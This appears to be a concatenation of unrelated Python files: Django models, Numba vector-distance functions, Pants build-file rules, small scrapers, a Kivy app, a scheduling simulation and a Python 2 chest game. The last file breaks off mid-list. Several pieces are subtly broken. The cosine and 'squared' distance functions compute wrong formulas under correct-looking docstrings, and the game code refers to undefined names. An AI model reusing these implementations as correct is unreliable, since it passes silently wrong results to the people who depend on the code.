product = models.ForeignKey(Product, on_delete=models.CASCADE, related_name='comments')
user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='comments')
rating = models.PositiveBigIntegerField(default=1)
created_at = models.DateTimeField(auto_now_add=True)
class Meta:
ordering = ['created_at']
constraints = [
CheckConstraint(
check=models.Q(rating__gte=1) & models.Q(rating__lte=10),
name='rating_range'
)
]
class Like(models.Model):
product = models.ForeignKey(Product, on_delete=models.CASCADE, related_name='likes')
user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='likes')
is_liked = models.BooleanField(default=False)
|
from numba import jit
import numpy as np
'''
this module implements functions for measuring feature vector similarity
between graph verticies. loop-based functions are just-in-time compiled with
numba, which results in fast code with limited memory overhead.
Note: all distances are stored at 64-bit floating point numbers
'''
@jit(nopython=True)
def pairwise_cos_distance(feature_vectors):
'''
pairwise cosine similarity function for verticies
Args:
feature_vectors (ndarray) M (num samples) x N (num features)
Returns (ndarray) M x M array of bits
'''
M = feature_vectors.shape[0]
N = feature_vectors.shape[1]
D = np.empty((M, M), dtype=np.float64)
for i in range(M):
for j in range(M):
dot = 0.0
idot = 0.0
jdot = 0.0
for k in range(N):
tmp = feature_vectors[i, k] * feature_vectors[j, k]
dot += tmp
tmp = feature_vectors[i, k] * feature_vectors[i, k]
idot += tmp
tmp = feature_vectors[j, k] * feature_vectors[j, k]
jdot += tmp
D[i, j] = dot / idot / jdot
return D
@jit(nopython=True)
def sub_pairwise_cos_distance(feature_vectors, sub_vectors):
'''
pairwise cosine similarity for a subset of verticies
Args:
feature_vectors (ndarray) M (samples) x N (features)
sub_vectors (ndarray) m (samples) x N (features), where m <= M
Returns (ndarray) M x m array of bits
'''
M = feature_vectors.shape[0]
N = feature_vectors.shape[1]
m = sub_vectors.shape[0]
D = np.empty((M, m), dtype=np.float64)
for i in range(M):
for j in range(m):
dot = 0.0
idot = 0.0
jdot = 0.0
for k in range(N):
tmp = feature_vectors[i, k] * sub_vectors[j, k]
dot += tmp
tmp = feature_vectors[i, k] * sub_vectors[i, k]
idot += tmp
tmp = feature_vectors[j, k] * sub_vectors[j, k]
jdot += tmp
D[i, j] = dot / idot / jdot
return D
@jit(nopython=True)
def pairwise_squared_distance(feature_vectors):
'''
pairwise squared distance function for verticies
Args:
feature_vectors (ndarray) M (num samples) x N (num features)
Returns (ndarray) M x M array of bits
'''
M = feature_vectors.shape[0]
N = feature_vectors.shape[1]
D = np.empty((M, M), dtype=np.float64)
for i in range(M):
for j in range(M):
d = 0.0
for k in range(N):
tmp = feature_vectors[i, k] - feature_vectors[j, k]
d += tmp
D[i, j] = np.sqrt(d)
return D
@jit(nopython=True)
def sub_pairwise_squared_distance(feature_vectors, sub_vectors):
'''
pairwise squared distance function for a subset of verticies
Args:
feature_vectors (ndarray) M (samples) x N (features)
sub_vectors (ndarray) m (samples) x N (features), where m <= M
Returns (ndarray) M x m array of bits
'''
M = feature_vectors.shape[0]
N = feature_vectors.shape[1]
m = sub_vectors.shape[0]
D = np.empty((M, m), dtype=np.float64)
for i in range(M):
for j in range(m):
d = 0.0
for k in range(N):
tmp = feature_vectors[i, k] - sub_vectors[j, k]
d += tmp
D[i, j] = np.sqrt(d)
return D
|
from .unet import UNet, UNetWithClassificationHead
from .fpn import FPN
|
from django.apps import AppConfig
class CaninoConfig(AppConfig):
name = 'canino'
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from pants.backend.java.lint.google_java_format import rules as fmt_rules
from pants.backend.java.lint.google_java_format import skip_field
from pants.jvm import jdk_rules, util_rules
from pants.jvm.goals import lockfile
from pants.jvm.resolve import coursier_fetch, jvm_tool
def rules():
return [
*fmt_rules.rules(),
*skip_field.rules(),
*jdk_rules.rules(),
*lockfile.rules(),
*jvm_tool.rules(),
*coursier_fetch.rules(),
*util_rules.rules(),
]
|
from setuptools import setup
setup(name='kazikame',
version='0.1',
description='You have got bombs, So plant them and destroy!! ',
url='https://github.com/theBansal/project-delta',
author='Ironhulk',
author_email='ironhulk4@gmail.com',
license='NIT',
packages=['Kazikame'],
zip_safe=False)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-05-22 12:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('edu', '0010_auto_20190521_1138'),
]
operations = [
migrations.AlterField(
model_name='classroom',
name='branch',
field=models.CharField(choices=[('a', 'الف'), ('b', 'ب'), ('c', 'ج')], default='a', max_length=2, null=True, verbose_name='گروه'),
),
migrations.AlterField(
model_name='levelfield',
name='field',
field=models.CharField(blank=True, choices=[('math', 'ریاضی'), ('natural', 'تجربی'), ('humanity', 'انسانی')], max_length=10, verbose_name='رشته'),
),
migrations.AlterField(
model_name='levelfield',
name='level',
field=models.CharField(choices=[('first', 'اول'), ('second', 'دوم'), ('third', 'سوم')], default='first', max_length=10, verbose_name='پایه'),
),
]
|
import pandas as pd
import matplotlib.pyplot as plt
airquality_df=pd.read_csv('E:\csvdhf5xlsxurlallfiles/airquality.csv')
print(airquality_df.head())
month=airquality_df['Month']
temperature=airquality_df['Temp']
#using axes()
plt.axes([0.05,0.05,0.425,0.9])
plt.plot(airquality_df, month, 'r')
plt.axes([0.05,0.05,0.425,0.9])
plt.plot(airquality_df, temperature, 'b')
plt.show()
#using subplot()
plt.subplot(2,1,1)
plt.plot(airquality_df, month, 'r')
plt.subplot(2,1,2)
plt.plot(airquality_df, temperature, 'b')
plt.tight_layout()
plt.show()
|
# -*- coding:utf-8 _*-
"""
@author:Administrator
@file: main.py
@time: 2019/1/9
"""
from scrapy.cmdline import execute
# execute('scrapy crawl realtor -s JOBDIR=crawls/trulia_state_county_zip-1'.split(' '))
execute('scrapy crawl realtor'.split(' '))
|
# -*- coding: utf-8 -*-
# @Author : WangNing
# @Email : 3190193395@qq.com
# @File : static_variables.py
# @Software: PyCharm
import os
# 工程目录
PROJECT_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# 数据库配置文件
DB_CONFIG = PROJECT_PATH + "/config/db_config.ini"
# 测试脚本存放位置
SCRIPT_PATH = PROJECT_PATH + "/scripts"
if __name__ == '__main__':
print(PROJECT_PATH)
print(SCRIPT_PATH)
print(DB_CONFIG)
|
#!/usr/bin/env python
"""
Name: Rafael Broseghini
Implementation of a 'Soccer Tournament' using data
from the LCMS website stored in a text file.
"""
import random
from team import Team
from tournament import Tournament
from roster import Roster
from player import Player
class Facility:
def __init__(self, size):
self._size = size
# Field is a Facility.
class Field(Facility):
def __init__(self, size, surface):
super().__init__(size)
self._surface = surface
def __str__(self):
return self._size + "" + self._surface + " fields."
def main():
f = Field("30x50 yards ", "grass")
all_players = Roster()
r = all_players.roster
tourney = Tournament()
divided_teams = tourney.make_teams(r)
# # print(test)
winner = tourney.compute_winner()
print("These are the teams:\n")
for t in range(len(divided_teams)):
print("{}\n".format(divided_teams[t]))
print("The winner is: \033[1;32m{}\033[0m".format(winner))
if __name__ == "__main__":
main()
|
"""
This module extra functions/shortcuts to communicate with the system
(executing commands, etc.)
"""
import inspect
import os
import pwd
import re
import subprocess
from django.conf import settings
from django.utils.encoding import force_str
def exec_cmd(cmd, sudo_user=None, pinput=None, capture_output=True, **kwargs):
"""Execute a shell command.
Run a command using the current user. Set :keyword:`sudo_user` if
you need different privileges.
:param str cmd: the command to execute
:param str sudo_user: a valid system username
:param str pinput: data to send to process's stdin
:param bool capture_output: capture process output or not
:rtype: tuple
:return: return code, command output
"""
if sudo_user is not None:
cmd = "sudo -u %s %s" % (sudo_user, cmd)
kwargs["shell"] = True
if pinput is not None:
kwargs["stdin"] = subprocess.PIPE
if capture_output:
kwargs.update(stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
process = subprocess.Popen(cmd, **kwargs)
if pinput or capture_output:
c_args = [pinput] if pinput is not None else []
output = process.communicate(*c_args)[0]
else:
output = None
process.wait()
return process.returncode, output
def doveadm_cmd(params, pinput=None, capture_output=True, **kwargs):
"""Execute doveadm command.
Run doveadm command using the current user. Set :keyword:`sudo_user` if
you need different privileges.
:param str params: the parameters to give to doveadm
:param str sudo_user: a valid system username
:param str pinput: data to send to process's stdin
:param bool capture_output: capture process output or not
:rtype: tuple
:return: return code, command output
"""
dpath = None
code, output = exec_cmd("which doveadm")
if not code:
dpath = force_str(output).strip()
else:
known_paths = getattr(
settings, "DOVEADM_LOOKUP_PATH",
("/usr/bin/doveadm", "/usr/local/bin/doveadm")
)
for fpath in known_paths:
if os.path.isfile(fpath) and os.access(fpath, os.X_OK):
dpath = fpath
break
dovecot_user = getattr(settings, "DOVECOT_USER", "vmail")
curuser = pwd.getpwuid(os.getuid()).pw_name
sudo_user = dovecot_user if curuser != dovecot_user else None
if dpath:
return exec_cmd("{} {}".format(dpath, params),
sudo_user=sudo_user,
pinput=pinput,
capture_output=capture_output,
**kwargs)
raise OSError("doveadm command not found")
def guess_extension_name():
"""Tries to guess the application's name by inspecting the stack.
:return: a string or None
"""
modname = inspect.getmodule(inspect.stack()[2][0]).__name__
match = re.match(r"(?:modoboa\.)?(?:extensions\.)?([^\.$]+)", modname)
if match is not None:
return match.group(1)
return None
|
#encoding: utf-8
def permutaciones(lista):
if len(lista) == 0:
return [[]]
return sum([inserta_multiple(lista[0], s) for s in permutaciones(lista[1:])],[])
def permutaciones_tr(lista,res):
#print 'permutaciones_tr(',lista,res,')'
if len(lista) == 0:
return res
if len(res) == 0 :
r = [lista[0]]
else:
r=inserta_multiple_tr(lista[0],res)
return permutaciones_tr(lista[1:],r)
def inserta_multiple_tr(x,lista) :
res = []
if len(lista) > 1 :
for item in lista :
res.extend(inserta_multiple(x,item))
return res
else :
return inserta_multiple(x,lista)
def inserta(x,lista,i):
res = lista[:i] + [x] + lista[i:]
return res
def inserta_multiple(x,lista) :
#'inserta_multiple(',x,lista,')'
res = []
for i in range(len(lista)+1):
res.append(inserta(x,lista,i))
return res
print permutaciones_tr([1,2,3,4],[])
|
from kivy.app import App
from kivy.properties import ObjectProperty, StringProperty
from kivy.uix.widget import Widget
from kivy.core.window import Window
from gui.Header import Header
class State:
pass
class MainWidget(Widget):
base_w = 640
base_h = 480
state = StringProperty("Home")
header = Header()
def load_page(self, page):
print(page)
class MainApp(App):
def build(self):
Window.size = (320, 240)
return MainWidget()
if __name__ == '__main__':
MainApp().run()
|
from django.db import models
from django.db.models import *
# Create your models here.
class stock(models.Model):
stock_id = CharField(max_length=6,verbose_name='股票代码',unique=True)
stock_name = CharField(max_length=32, verbose_name='股票简称')
stock_price = DecimalField(max_digits=10,decimal_places=2,verbose_name='股票现价(元)')
stock_increase = DecimalField(max_digits=10,decimal_places=2,verbose_name='股票涨幅(%)')
stock_concept = CharField(max_length=1024, verbose_name='概念解析')
stock_concept_num = IntegerField(max_length=5,verbose_name='所属概念数量')
stock_market_value = CharField(max_length=16,verbose_name='市值(亿)')
stock_industry = CharField(max_length=32, verbose_name='所属行业')
class Meta():
db_table = 'stock'
def __str__(self):
return '{0}_{1}'.format(self.stock_id,self.stock_name)
class account(models.Model):
user_id = models.IntegerField(max_length=11,verbose_name='用户Id',unique=True)
name = models.CharField(max_length=11, verbose_name='姓名')
id_card = models.CharField(max_length=18, verbose_name='身份证号',unique=True)
bank_id = models.IntegerField(max_length=3, verbose_name='所属银行' )
bank_no = models.CharField(max_length=20, verbose_name='银行卡号')
addr = models.CharField(max_length=1024, verbose_name='居住地址',default='')
is_opened = models.IntegerField(max_length=1,verbose_name='是否开户',default=0)
created_time = models.DateTimeField(auto_now_add=True)
updated_time = models.DateTimeField(auto_now=True)
class Meta:
db_table = 'account'
def __str__(self):
return '%s_%s' %(self.name, self.id_card)
|
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
matplotlib.rcParams['pdf.fonttype'] = 42
matplotlib.rcParams['ps.fonttype'] = 42
import math
import random
import gc
import platform
np.random.seed(123)
sysstr = platform.system()
print(sysstr)
if sysstr == 'Windows':
import queue as Queue
elif sysstr == 'Darwin':
import Queue
qm = [0 for col in range(2)]
Ym = [0 for col in range(2)]
count = 50000
V = 1000
k = [1.0, 1.0]
# alpha = 10000.0
Rm = [0 for col in range(2)]
alp = 0.9
for n in range(0, 2):
qm[n] = Queue.Queue(maxsize=count)
maxvalue = 0.0
max_last = 0.0
r_keep = [0.0 for col in range(2)]
r = [0.0 for col in range(2)]
channel_lambda = [0.3, 0.6]
arrival_lambda = [0.5, 0.7]
channel = [0 for col in range(2)]
schedule = -1
delay_every_step = [[0 for col in range(count)] for row in range(2)]
tran_count = [0 for col in range(2)]
arrival = [0 for col in range(2)]
max_delay = [0 for col in range(2)]
def Channel():
for n in range(0, 2):
tmp = np.random.binomial(1, channel_lambda[n], 1)
channel[n] = tmp[0]
def Arrival(i):
for m in range(0, 2):
if Rm[m] == 1 and qm[m].full() is False:
qm[m].put(i)
arrival[m] += 1
# def Clear():
# for m in range(0, 2):
# while qm[m].empty() is False:
# qm[m].get()
for i in range(0, count):
maxvalue = -100000000.0
max_last = -100000000.0
for m in range(0, 2):
r_keep[m] = 0.0
r[0] = -1.0
while r[0] <= 1.0:
r[1] = -1.0
while r[1] <= 1.0 and (r[0] + r[1]) <= 2.0:
if r[0] < 0:
tmp1 = r[0]
else:
tmp1 = math.log(1 + r[0])
if r[1] < 0:
tmp2 = r[1]
else:
tmp2 = math.log(1 + r[1])
tmp3 = V * (tmp1 + tmp2)
tmp4 = Ym[0] * r[0] + Ym[1] * r[1]
maxvalue = tmp3 - tmp4
if maxvalue > max_last:
max_last = maxvalue
r_keep[0] = r[0]
r_keep[1] = r[1]
r[1] += 0.025
r[0] += 0.025
Channel()
if qm[0].empty() is False:
tmp1 = qm[0].qsize() * channel[0]
# tmp1 = (i - qm[0].queue[0]) * channel[0]
else:
tmp1 = 0
if qm[1].empty() is False:
tmp2 = qm[1].qsize() * channel[1]
# tmp2 = (i - qm[1].queue[0]) * channel[1]
else:
tmp2 = 0
if tmp1 > tmp2:
schedule = 0
elif tmp1 == tmp2:
tmp = [0, 1]
tmp3 = random.sample(tmp, 1)
schedule = tmp3[0]
else:
schedule = 1
for m in range(0, 2):
tmp1 = qm[m].qsize()
tmp = float(tmp1)
if tmp < Ym[m]:
Rm[m] = 1
else:
Rm[m] = 0
if qm[schedule].empty() is False and channel[schedule] == 1:
tmp = i - qm[schedule].get()
tran_count[schedule] += 1
if tmp > max_delay[schedule]:
max_delay[schedule] = tmp
# print(qm[0].qsize(), qm[1].qsize())
for m in range(0, 2):
if qm[m].empty() is False:
delay_every_step[m][i] = (i - qm[m].queue[0]) * k[m]
else:
delay_every_step[m][i] = 0.0
for m in range(0, 2):
tmp = Ym[m] - Rm[m] + r_keep[m]
if tmp > 0:
Ym[m] = tmp
else:
Ym[m] = 0
Arrival(i)
print(arrival)
plt.figure(1)
x = np.linspace(0, count, count)
plt.xlabel('Time')
plt.ylabel('HOL delay')
plt.plot(x, delay_every_step[0], label='HOL delay, link 0, CL-MW')
plt.plot(x, delay_every_step[1], label='HOL delay, link 1, CL-MW')
plt.legend(loc='lower right')
plt.show()
del count, V, maxvalue, max_last, r_keep, r
del channel, schedule, channel_lambda
del tran_count, arrival_lambda
gc.collect()
|
#!/usr/bin/python3
import urllib.request
import urllib.parse
#x = urllib.request.urlopen("http://www.baidu.com")
#print(x.read())
'''
#get method
url="http://music.baidu.com/search"
values={"key":"Ed Sheeran"}
data = urllib.parse.urlencode(values)
data = data.encode('utf-8')
req = urllib.request.Request(url,data)
resp = urllib.request.urlopen(req)
print(resp.read())
'''
try:
url="http://music.baidu.com"
headers={}
headers['User-Agent'] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0"
req = urllib.request.Request(url,headers=headers)
resp=urllib.request.urlopen(req)
respData= resp.read()
saveFile = open("html.txt",'w')
saveFile.write(str(respData))
saveFile.flush()
saveFile.close()
except Exception as e:
print(str(e))
|
class rooms(object):
def __init__(self, layout, doorlist, chestlist, isloaded, yborder, xborder, comoprinter):
self.layout = layout
self.doorlist = doorlist
self.chestlist = chestlist
self.loaded = isloaded
self.yborder = yborder
self.xborder = xborder
self.comoprinter = comoprinter
class doors(object):
def __init__(self, r1x, r1y, r2x, r2y, islocked):
self.rlx = rlx
self.rly = r1y
self.r2x = r2x
self.r2y = r2y
self.islocked = islocked
chestque = ""
class chest(object):
def __init__(self, room, y, x, things):
self.room = room
self.y = y
self.x = x
self.things = things
def chestplace(self):
self.roomnumber[self.y][self.x] = "C"
def openingchest(self):
print self.things
global chestque
if self.things == []:
aredone = 1
else:
aredone = 0
passo = False
tradedone = 0
while aredone == 0:
chestque = raw_input("What do you want?")
passo = 0
if chestque == "all":
tradedone = 1
global inv
for ele in self.things:
print ele + "debug"
inv.append(ele)
self.things = []
print self.things
elif chestque == "null":
tradedone = 1
else:
for i in self.things:
passo = False
print i + " debug"
if chestque == i:
tradedone = 1
inv.append(chestque)
self.things.remove(chestque)
print self.things
else:
pass
if tradedone == 1:
pass
else:
print "Not Found"
if tradedone == 0:
pass
else:
de = raw_input("Are you done? Yes or No?: ")
if de == "No":
passo = True
elif de == "Yes":
if passo == False:
print "Thanks for shopping!"
aredone = 1
else:
pass
else:
print "Guess you're not done????"
print "Bye!"
chest1_4_4 = chest(room1, 4, 4, ["shirt", "apple", "stick", "banana"])
chest1_4_4.chestplace()
chest1_2_1 = chest(room1, 2, 1, ["flint", "iron", "coal"])
chest1_2_1.chestplace()
list_of_chests = [chest1_4_4, chest1_2_1]
def openchest(y, x):
print "CHEST BOI"
global list_of_chests
for i in list_of_chests:
if i.y == y and i.x == x:
i.openingchest()
global xcoord
global ycoord
rebound(y, x)
def rebound(yco, xco):
global ycoord
global xcoord
if user_input == "w":
yco += 1
ycoord += 1
room[yco][xco] = "G"
print_room(room)
elif user_input == "s":
yco -= 1
ycoord -= 1
room[yco][xco] = "G"
print_room(room)
elif user_input == "a":
xco += 1
xcoord += 1
room[yco][xco] = "G"
print_room(room)
elif user_input == "d":
xco -= 1
xcoord -= 1
room[yco][xco] = "G"
print_room(room)
#The below block sets up room1's layout
global proxy
proxy = []
def roombuilding1(q):
for x in range(0, 7):
proxy.append(["#"] * 7)
nerds = [0, 6]
for le in nerds:
for i in range(0, 7):
proxy[le][i] = "B"
proxy[i][le] = "B"
proxy[3][6] = "D"
proxy[1][2] = "W"
proxy[2][2] = "W"
proxy[3][2] = "W"
proxy[4][2] = "W"
return proxy
room1setup = roombuilding1(8)
room1doors = room1setup[3][6]
room1chests
def room1printer(var):
global proxy
for row in proxy:
print " ".join(row)
room1 = rooms(room1setup, room1doors, room1chests, True, 6, 6, room1printer(8))
room1.comoprinter
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import dataclasses
import logging
import os.path
import tokenize
from collections import defaultdict
from dataclasses import dataclass
from enum import Enum
from io import BytesIO
from typing import DefaultDict, cast
from colors import green, red
from pants.backend.build_files.fix.deprecations import renamed_fields_rules, renamed_targets_rules
from pants.backend.build_files.fix.deprecations.base import FixedBUILDFile
from pants.backend.build_files.fmt.black.register import BlackRequest
from pants.backend.build_files.fmt.yapf.register import YapfRequest
from pants.backend.python.goals import lockfile
from pants.backend.python.lint.black.rules import _run_black
from pants.backend.python.lint.black.subsystem import Black
from pants.backend.python.lint.yapf.rules import _run_yapf
from pants.backend.python.lint.yapf.subsystem import Yapf
from pants.backend.python.subsystems.python_tool_base import get_lockfile_interpreter_constraints
from pants.backend.python.util_rules import pex
from pants.base.specs import Specs
from pants.engine.console import Console
from pants.engine.engine_aware import EngineAwareParameter
from pants.engine.environment import EnvironmentName
from pants.engine.fs import (
CreateDigest,
Digest,
DigestContents,
FileContent,
PathGlobs,
Paths,
Snapshot,
SpecsPaths,
Workspace,
)
from pants.engine.goal import Goal, GoalSubsystem
from pants.engine.internals.build_files import BuildFileOptions
from pants.engine.internals.parser import ParseError
from pants.engine.rules import Get, MultiGet, collect_rules, goal_rule, rule
from pants.engine.unions import UnionMembership, UnionRule, union
from pants.option.option_types import BoolOption, EnumOption
from pants.util.docutil import bin_name, doc_url
from pants.util.logging import LogLevel
from pants.util.memo import memoized
from pants.util.strutil import help_text, softwrap
logger = logging.getLogger(__name__)
# ------------------------------------------------------------------------------------------
# Generic goal
# ------------------------------------------------------------------------------------------
@dataclass(frozen=True)
class RewrittenBuildFile:
path: str
lines: tuple[str, ...]
change_descriptions: tuple[str, ...]
class Formatter(Enum):
YAPF = "yapf"
BLACK = "black"
@union(in_scope_types=[EnvironmentName])
@dataclass(frozen=True)
class RewrittenBuildFileRequest(EngineAwareParameter):
path: str
lines: tuple[str, ...]
colors_enabled: bool = dataclasses.field(compare=False)
def debug_hint(self) -> str:
return self.path
def to_file_content(self) -> FileContent:
lines = "\n".join(self.lines) + "\n"
return FileContent(self.path, lines.encode("utf-8"))
@memoized
def tokenize(self) -> list[tokenize.TokenInfo]:
_bytes_stream = BytesIO("\n".join(self.lines).encode("utf-8"))
try:
return list(tokenize.tokenize(_bytes_stream.readline))
except tokenize.TokenError as e:
raise ParseError(f"Failed to parse {self.path}: {e}")
def red(self, s: str) -> str:
return cast(str, red(s)) if self.colors_enabled else s
def green(self, s: str) -> str:
return cast(str, green(s)) if self.colors_enabled else s
class DeprecationFixerRequest(RewrittenBuildFileRequest):
"""A fixer for deprecations.
These can be disabled by the user with `--no-fix-safe-deprecations`.
"""
class UpdateBuildFilesSubsystem(GoalSubsystem):
name = "update-build-files"
help = help_text(
f"""
Format and fix safe deprecations in BUILD files.
This does not handle the full Pants upgrade. You must still manually change
`pants_version` in `pants.toml` and you may need to manually address some deprecations.
See {doc_url('upgrade-tips')} for upgrade tips.
This goal is run without arguments. It will run over all BUILD files in your
project.
"""
)
@classmethod
def activated(cls, union_membership: UnionMembership) -> bool:
return RewrittenBuildFileRequest in union_membership
check = BoolOption(
default=False,
help=softwrap(
"""
Do not write changes to disk, only write back what would change. Return code
0 means there would be no changes, and 1 means that there would be.
"""
),
)
fmt = BoolOption(
default=True,
help=softwrap(
"""
Format BUILD files using Black or Yapf.
Set `[black].args` / `[yapf].args`, `[black].config` / `[yapf].config` ,
and `[black].config_discovery` / `[yapf].config_discovery` to change
Black's or Yapf's behavior. Set
`[black].interpreter_constraints` / `[yapf].interpreter_constraints`
and `[python].interpreter_search_path` to change which interpreter is
used to run the formatter.
"""
),
)
formatter = EnumOption(
default=Formatter.BLACK,
help="Which formatter Pants should use to format BUILD files.",
)
fix_safe_deprecations = BoolOption(
default=True,
help=softwrap(
"""
Automatically fix deprecations, such as target type renames, that are safe
because they do not change semantics.
"""
),
)
class UpdateBuildFilesGoal(Goal):
subsystem_cls = UpdateBuildFilesSubsystem
environment_behavior = Goal.EnvironmentBehavior.LOCAL_ONLY
@goal_rule(desc="Update all BUILD files", level=LogLevel.DEBUG)
async def update_build_files(
update_build_files_subsystem: UpdateBuildFilesSubsystem,
build_file_options: BuildFileOptions,
console: Console,
workspace: Workspace,
union_membership: UnionMembership,
specs: Specs,
) -> UpdateBuildFilesGoal:
if not specs:
if not specs.includes.from_change_detection:
logger.warning(
softwrap(
f"""\
No arguments specified with `{bin_name()} update-build-files`, so the goal will
do nothing.
Instead, you should provide arguments like this:
* `{bin_name()} update-build-files ::` to run on everything
* `{bin_name()} update-build-files dir::` to run on `dir` and subdirs
* `{bin_name()} update-build-files dir` to run on `dir`
* `{bin_name()} update-build-files dir/BUILD` to run on that single BUILD file
* `{bin_name()} --changed-since=HEAD update-build-files` to run only on changed BUILD files
"""
)
)
return UpdateBuildFilesGoal(exit_code=0)
all_build_file_paths, specs_paths = await MultiGet(
Get(
Paths,
PathGlobs(
globs=(
*(os.path.join("**", p) for p in build_file_options.patterns),
*(f"!{p}" for p in build_file_options.ignores),
)
),
),
Get(SpecsPaths, Specs, specs),
)
specified_paths = set(specs_paths.files)
specified_build_files = await Get(
DigestContents,
PathGlobs(fp for fp in all_build_file_paths.files if fp in specified_paths),
)
rewrite_request_classes = []
for request in union_membership[RewrittenBuildFileRequest]:
if issubclass(request, (FormatWithBlackRequest, FormatWithYapfRequest)):
is_chosen_formatter = issubclass(request, FormatWithBlackRequest) ^ (
update_build_files_subsystem.formatter == Formatter.YAPF
)
if update_build_files_subsystem.fmt and is_chosen_formatter:
rewrite_request_classes.append(request)
else:
continue
if update_build_files_subsystem.fix_safe_deprecations or not issubclass(
request, DeprecationFixerRequest
):
rewrite_request_classes.append(request)
build_file_to_lines = {
build_file.path: tuple(build_file.content.decode("utf-8").splitlines())
for build_file in specified_build_files
}
build_file_to_change_descriptions: DefaultDict[str, list[str]] = defaultdict(list)
for rewrite_request_cls in rewrite_request_classes:
all_rewritten_files = await MultiGet( # noqa: PNT30: this is inherently sequential
Get(
RewrittenBuildFile,
RewrittenBuildFileRequest,
rewrite_request_cls(build_file, lines, colors_enabled=console._use_colors),
)
for build_file, lines in build_file_to_lines.items()
)
for rewritten_file in all_rewritten_files:
if not rewritten_file.change_descriptions:
continue
build_file_to_lines[rewritten_file.path] = rewritten_file.lines
build_file_to_change_descriptions[rewritten_file.path].extend(
rewritten_file.change_descriptions
)
changed_build_files = sorted(
build_file
for build_file, change_descriptions in build_file_to_change_descriptions.items()
if change_descriptions
)
if not changed_build_files:
msg = "No required changes to BUILD files found."
if not update_build_files_subsystem.check:
msg += softwrap(
f"""
However, there may still be deprecations that `update-build-files` doesn't know
how to fix. See {doc_url('upgrade-tips')} for upgrade tips.
"""
)
logger.info(msg)
return UpdateBuildFilesGoal(exit_code=0)
if not update_build_files_subsystem.check:
result = await Get(
Digest,
CreateDigest(
FileContent(
build_file, ("\n".join(build_file_to_lines[build_file]) + "\n").encode("utf-8")
)
for build_file in changed_build_files
),
)
workspace.write_digest(result)
for build_file in changed_build_files:
formatted_changes = "\n".join(
f" - {description}" for description in build_file_to_change_descriptions[build_file]
)
tense = "Would update" if update_build_files_subsystem.check else "Updated"
console.print_stdout(f"{tense} {console.blue(build_file)}:\n{formatted_changes}")
if update_build_files_subsystem.check:
console.print_stdout(
f"\nTo fix `update-build-files` failures, run `{bin_name()} update-build-files`."
)
return UpdateBuildFilesGoal(exit_code=1 if update_build_files_subsystem.check else 0)
# ------------------------------------------------------------------------------------------
# Yapf formatter fixer
# ------------------------------------------------------------------------------------------
class FormatWithYapfRequest(RewrittenBuildFileRequest):
pass
@rule
async def format_build_file_with_yapf(
request: FormatWithYapfRequest, yapf: Yapf
) -> RewrittenBuildFile:
input_snapshot = await Get(Snapshot, CreateDigest([request.to_file_content()]))
yapf_ics = await get_lockfile_interpreter_constraints(yapf)
result = await _run_yapf(
YapfRequest.Batch(
Yapf.options_scope,
input_snapshot.files,
partition_metadata=None,
snapshot=input_snapshot,
),
yapf,
yapf_ics,
)
output_content = await Get(DigestContents, Digest, result.output.digest)
formatted_build_file_content = next(fc for fc in output_content if fc.path == request.path)
build_lines = tuple(formatted_build_file_content.content.decode("utf-8").splitlines())
change_descriptions = ("Format with Yapf",) if result.did_change else ()
return RewrittenBuildFile(request.path, build_lines, change_descriptions=change_descriptions)
# ------------------------------------------------------------------------------------------
# Black formatter fixer
# ------------------------------------------------------------------------------------------
class FormatWithBlackRequest(RewrittenBuildFileRequest):
pass
@rule
async def format_build_file_with_black(
request: FormatWithBlackRequest, black: Black
) -> RewrittenBuildFile:
input_snapshot = await Get(Snapshot, CreateDigest([request.to_file_content()]))
black_ics = await get_lockfile_interpreter_constraints(black)
result = await _run_black(
BlackRequest.Batch(
Black.options_scope,
input_snapshot.files,
partition_metadata=None,
snapshot=input_snapshot,
),
black,
black_ics,
)
output_content = await Get(DigestContents, Digest, result.output.digest)
formatted_build_file_content = next(fc for fc in output_content if fc.path == request.path)
build_lines = tuple(formatted_build_file_content.content.decode("utf-8").splitlines())
change_descriptions = ("Format with Black",) if result.did_change else ()
return RewrittenBuildFile(request.path, build_lines, change_descriptions=change_descriptions)
# ------------------------------------------------------------------------------------------
# Rename deprecated target types fixer
# ------------------------------------------------------------------------------------------
class RenameDeprecatedTargetsRequest(DeprecationFixerRequest):
pass
@rule(desc="Check for deprecated target type names", level=LogLevel.DEBUG)
async def maybe_rename_deprecated_targets(
request: RenameDeprecatedTargetsRequest,
) -> RewrittenBuildFile:
old_bytes = "\n".join(request.lines).encode("utf-8")
new_content = await Get(
FixedBUILDFile,
renamed_targets_rules.RenameTargetsInFileRequest(path=request.path, content=old_bytes),
)
return RewrittenBuildFile(
request.path,
tuple(new_content.content.decode("utf-8").splitlines()),
change_descriptions=("Renamed deprecated targets",)
if old_bytes != new_content.content
else (),
)
# ------------------------------------------------------------------------------------------
# Rename deprecated field types fixer
# ------------------------------------------------------------------------------------------
class RenameDeprecatedFieldsRequest(DeprecationFixerRequest):
pass
@rule(desc="Check for deprecated field type names", level=LogLevel.DEBUG)
async def maybe_rename_deprecated_fields(
request: RenameDeprecatedFieldsRequest,
) -> RewrittenBuildFile:
old_bytes = "\n".join(request.lines).encode("utf-8")
new_content = await Get(
FixedBUILDFile,
renamed_fields_rules.RenameFieldsInFileRequest(path=request.path, content=old_bytes),
)
return RewrittenBuildFile(
request.path,
tuple(new_content.content.decode("utf-8").splitlines()),
change_descriptions=("Renamed deprecated fields",)
if old_bytes != new_content.content
else (),
)
def rules():
return (
*collect_rules(),
*collect_rules(renamed_fields_rules),
*collect_rules(renamed_targets_rules),
*pex.rules(),
*lockfile.rules(),
UnionRule(RewrittenBuildFileRequest, RenameDeprecatedTargetsRequest),
UnionRule(RewrittenBuildFileRequest, RenameDeprecatedFieldsRequest),
# NB: We want this to come at the end so that running Black or Yapf happens
# after all our deprecation fixers.
